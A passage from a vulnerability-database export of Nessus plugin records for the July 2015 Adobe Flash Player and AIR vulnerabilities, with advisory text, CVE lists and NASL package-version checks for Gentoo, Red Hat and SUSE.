\"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\"\n );\n script_xref(name:\"GLSA\", value:\"201507-13\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201507-13\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201507-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.481'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.481\"), vulnerable:make_list(\"lt 11.2.202.481\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:30", "description": "An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin APSB15-16 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2015-3117, CVE-2015-3118, CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-3123, CVE-2015-3124, CVE-2015-3126, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131, CVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429, CVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119)\n\nMultiple security bypass flaws were found in flash-plugin that could lead to the disclosure of sensitive information. (CVE-2014-0578, CVE-2015-3114, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.481.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:1214) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-1214.NASL", "href": "https://www.tenable.com/plugins/nessus/84631", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1214. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84631);\n script_version(\"2.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75590,\n 75591,\n 75592,\n 75593,\n 75595,\n 75596\n );\n script_xref(name:\"RHSA\", value:\"2015:1214\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:1214) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-16 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-3117, CVE-2015-3118,\nCVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\nCVE-2015-3123, CVE-2015-3124, CVE-2015-3126, CVE-2015-3127,\nCVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\nCVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135,\nCVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429,\nCVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433,\nCVE-2015-5117, CVE-2015-5118, CVE-2015-5119)\n\nMultiple security bypass flaws were found in flash-plugin that could\nlead to the disclosure of sensitive information. (CVE-2014-0578,\nCVE-2015-3114, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\nCVE-2015-5116)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.481.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2015:1214\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3121\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3122\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3125\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3124\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3127\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3129\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3128\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-5118\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-5119\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-5116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-5117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-0578\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4432\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4433\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4430\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-4431\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3118\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3119\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3114\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3132\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3133\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3136\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3137\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3134\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-3135\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2015-5124\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1214\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.481-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.481-1.el6_6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:22", "description": "Versions of Adobe AIR prior to 18.0.0.180 are outdated and thus unpatched for the following vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429)\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-11T00:00:00", "type": "nessus", "title": "Adobe AIR < 18.0.0.180 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:adobe_air:*:*:*:*:*:*:*:*"], "id": "8858.PRM", "href": "https://www.tenable.com/plugins/nnm/8858", "sourceData": "Binary data 8858.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:18:22", "description": "flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433: Type confusion vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119: Use-after-free vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-13T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1211-1) (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2015-1211-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84662", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1211-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84662);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\"\n );\n script_bugtraq_id(\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1211-1) (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer\n overflow vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130,\n CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory\n corruption vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference\n issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that\n could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121,\n CVE-2015-3122, CVE-2015-4433: Type confusion\n vulnerabilities that could lead to code execution\n (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117,\n CVE-2015-3127, CVE-2015-3128, CVE-2015-3129,\n CVE-2015-3131, CVE-2015-3132, CVE-2015-3136,\n CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could\n lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116,\n CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could\n be exploited to bypass the same-origin-policy and lead\n to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=937339\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2014-0578/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3118/\");\n script_set_attribute(attribute:\"see_also\", 